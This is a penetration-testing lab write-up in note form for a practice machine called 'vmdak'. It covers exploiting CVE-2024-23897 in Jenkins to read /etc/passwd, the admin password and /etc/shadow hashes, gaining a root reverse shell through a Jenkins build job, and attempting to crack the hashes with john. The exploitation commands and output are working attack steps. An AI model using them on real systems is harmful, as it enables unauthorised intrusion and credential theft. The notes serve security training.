CVE-2024-23897
The target Jenkins instance is vulnerable to CVE-2024-23897 due to its outdated version; 2.401.2
/Practice/vmdak/4-Post_Enumeration/attachments/{0D20F2C2-E90E-468A-A22C-D94D338ABAD4}.png)
A vulnerability was found in Jenkins. It has been declared as problematic. This vulnerability affects unknown code of the component Command Line Interface. The manipulation of the argument command leads to information disclosure. This vulnerability was named CVE-2024-23897. Furthermore, there is an exploit available. It is recommended to upgrade the affected component.
Exploit
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ searchsploit -m java/webapps/51993.py ; mv 51993.py CVE-2024-23897.py
Exploit: Jenkins 2.441 - Local File Inclusion
URL: https://www.exploit-db.com/exploits/51993
Path: /usr/share/exploitdb/exploits/java/webapps/51993.py
Codes: CVE-2024-23897
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/kali/PEN-200/PG_PRACTICE/vmdak/51993.pyCopied to the current directory
Exploitation
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ python3 CVE-2024-23897.py --url http://127.0.0.1:8888 -p /etc/passwd
systemd-network:x:998:998:systemd Network Management:/:/usr/sbin/nologin
tcpdump:x:105:107::/nonexistent:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
dhcpcd:x:100:65534:DHCP Client Daemon,,,:/usr/lib/dhcpcd:/bin/false
messagebus:x:101:102::/nonexistent:/usr/sbin/nologin
tss:x:106:108:TPM software stack,,,:/var/lib/tpm:/bin/false
fwupd-refresh:x:989:989:Firmware update daemon:/var/lib/fwupd:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
systemd-resolve:x:992:992:systemd Resolver:/:/usr/sbin/nologin
syslog:x:103:104::/nonexistent:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
pollinate:x:102:1::/var/cache/pollinate:/bin/false
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
mysql:x:110:110:MySQL Server,,,:/nonexistent:/bin/false
sync:x:4:65534:sync:/bin:/bin/sync
ftp:x:111:112:ftp daemon,,,:/srv/ftp:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
systemd-timesync:x:997:997:systemd Time Synchronization:/:/usr/sbin/nologin
root:x:0:0:root:/root:/bin/bash
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
polkitd:x:991:991:User for polkitd:/:/usr/sbin/nologin
landscape:x:107:109::/var/lib/landscape:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
sshd:x:109:65534::/run/sshd:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uuidd:x:104:105::/run/uuidd:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
vmdak:x:1000:1000::/home/vmdak:/bin/sh
games:x:5:60:games:/usr/games:/usr/sbin/nologinIt works!
Fetching /root/.jenkins/secrets/initialAdminPassword
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ python3 CVE-2024-23897.py --url http://127.0.0.1:8888 -p /root/.jenkins/secrets/initialAdminPassword
140ef31373034d19a77baa9c6b84a200140ef31373034d19a77baa9c6b84a200 is the admin password
Validation
/Practice/vmdak/4-Post_Enumeration/attachments/{D515EB9D-8BE6-43BC-B240-3091D5E3D857}.png)
/Practice/vmdak/4-Post_Enumeration/attachments/{890E2633-A2FB-44D9-AD23-D0BC6586133E}.png)
The password worked, but the target Jenkins instance hasn’t even been initialized
Initializing Jenkins
I could just initialize the instance myself and get code execution since it’s running with privileges of the root account
/Practice/vmdak/5-Privilege_Escalation/attachments/{4E0071AC-5C5A-4104-9124-9F68261B46B7}.png)
/Practice/vmdak/5-Privilege_Escalation/attachments/{0B5178C0-4D11-4AD2-82D0-9D6650E856BD}.png)
I will create a new job
New Job
/Practice/vmdak/5-Privilege_Escalation/attachments/{E621A096-BB1A-4251-BC42-1CBE583447FD}.png)
Trigger
/Practice/vmdak/5-Privilege_Escalation/attachments/{33072B54-A862-4E62-B9FB-7D989991DF5F}.png)
Setting up a build trigger
Build Steps
/Practice/vmdak/5-Privilege_Escalation/attachments/{F01B1E5C-C869-4C55-A084-B58C7D58BF84}.png)
/Practice/vmdak/5-Privilege_Escalation/attachments/{B1706958-A675-482A-8F9C-3AB4A5474D37}.png)
Setting up a Build Steps to execute a reverse shell
Triggering Build Remotely
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ curl http://localhost:8888/job/Privilege%20Escalation/build?token=qwe123Invoking the trigger remotely
/Practice/vmdak/5-Privilege_Escalation/attachments/{DD73FF8E-07AB-43C3-9A45-AA617C3D9F35}.png)
On the Jenkins GUI, it hangs because the payload was executed during the Build Steps
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.157] from (UNKNOWN) [192.168.125.103] 42832
bash: cannot set terminal process group (830): Inappropriate ioctl for device
bash: no job control in this shell
root@vmdak:~/.jenkins/workspace/Privilege Escalation# whoami
whoami
root
root@vmdak:~/.jenkins/workspace/Privilege Escalation# hostname
hostname
vmdak.local
root@vmdak:~/.jenkins/workspace/Privilege Escalation# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
3: ens160: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:9e:fa:06 brd ff:ff:ff:ff:ff:ff
altname enp3s0
inet 192.168.125.103/24 brd 192.168.125.255 scope global ens160
valid_lft forever preferred_lft foreverSystem level compromise
Fetching /etc/shadow
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ python3 CVE-2024-23897.py --url http://127.0.0.1:8888 -p /etc/shadow
sync:*:19836:0:99999:7:::
games:*:19836:0:99999:7:::
news:*:19836:0:99999:7:::
sshd:!:19894::::::
lp:*:19836:0:99999:7:::
www-data:*:19836:0:99999:7:::
systemd-network:!*:19836::::::
systemd-timesync:!*:19836::::::
dhcpcd:!:19836::::::
vmdak:$y$j9T$67oGS7fRiTKfRlI8a73JU1$9RNabWvHyOnkuSBwZ/YXhEvk7jnQ3mY4.zKIW7I9H04:19955:0:99999:7:::
_apt:*:19836:0:99999:7:::
root:$y$j9T$y3UT6o8YGAOCh7WX0IsEl.$Tlwx2N8ypOQlnRfbW8BlMSxq.4dOpvOqwXoSb0K91AA:19955:0:99999:7:::
tss:!:19836::::::
pollinate:!:19836::::::
backup:*:19836:0:99999:7:::
mysql:!:19955::::::
polkitd:!*:19836::::::
mail:*:19836:0:99999:7:::
ftp:!:19955::::::
sys:*:19836:0:99999:7:::
list:*:19836:0:99999:7:::
syslog:!:19836::::::
proxy:*:19836:0:99999:7:::
uucp:*:19836:0:99999:7:::
messagebus:!:19836::::::
nobody:*:19836:0:99999:7:::
man:*:19836:0:99999:7:::
fwupd-refresh:!*:19836::::::
tcpdump:!:19836::::::
irc:*:19836:0:99999:7:::
systemd-resolve:!*:19836::::::
bin:*:19836:0:99999:7:::
landscape:!:19836::::::
daemon:*:19836:0:99999:7:::
uuidd:!:19836::::::
usbmux:!:19894::::::Those hashes are yescrypt, and currently not supported by hashcat
Password Cracking (Fail)
/Practice/vmdak/5-Privilege_Escalation/attachments/{E4FBA9D1-8C10-4CE3-9DE9-F4FC634D9260}.png)
Checking online reveals that yescrypt could be cracked using john.
/Practice/vmdak/5-Privilege_Escalation/attachments/{79E0FE38-9EC4-4B41-94FE-C9E4195F63A6}.png)
However, the platform needs to natively support libxcrypt, and current Kali does
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/vmdak]
└─$ john ./root.hash --wordlist=/usr/share/wordlists/rockyou.txt --format=crypt
Using default input encoding: UTF-8
Loaded 1 password hash (crypt, generic crypt(3) [?/64])
Cost 1 (algorithm [1:descrypt 2:md5crypt 3:sunmd5 4:bcrypt 5:sha256crypt 6:sha512crypt]) is 0 for all loaded hashes
Cost 2 (algorithm specific iterations) is 1 for all loaded hashes
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:08:32 0.51% (ETA: 2025-04-11 01:18) 0g/s 172.2p/s 172.2c/s 172.2C/s newyear08..monkey#1
0g 0:00:08:35 0.52% (ETA: 2025-04-11 01:17) 0g/s 172.2p/s 172.2c/s 172.2C/s juliene..janele
Session abortedjohn was unable to crack the password hashes TAKES TOO LONG